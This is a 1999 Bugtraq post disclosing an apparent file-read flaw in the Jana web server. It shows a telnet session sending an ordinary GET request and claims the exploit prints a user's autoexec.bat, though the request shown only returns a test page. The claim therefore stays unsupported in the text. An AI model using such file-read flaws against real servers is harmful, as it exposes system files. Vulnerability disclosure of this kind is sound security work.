Bugtraq,
I have found a security flaw in Jana 1.0 webserver. I have not been able to
find out any information on who makes this product nor a place to download the
web server package. This webserver seems to be included as a suite of
Internet services, one of which I think is web-based chat. Enclosed is one
exploit I have found in the limited time that I have had to deal with this web
server. I am posting this information now so that one of you might know who
makes this software and how I might be able to get in touch with them for
further testing.
[root@foo whis]# telnet x.x.x.x 80
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.0 200 OK
Date: Mon, 04 Oct 1999 18:59:44 GMT
Server: Jana Server/1.40
Last-Modified: Mon, 04 Oct 1999 15:04:40 GMT
Content-Length: 38
Content-Type: text/html
Connection: close

<HTML><BODY><CENTER>TEST</BODY></HTML>Connection closed by foreign host.
[root@foo whis]# Prints user's autoexec.bat
I would like to say thank you to rain.forest.puppy. for all his help.
Jason Lutz
Sprint Print Inc
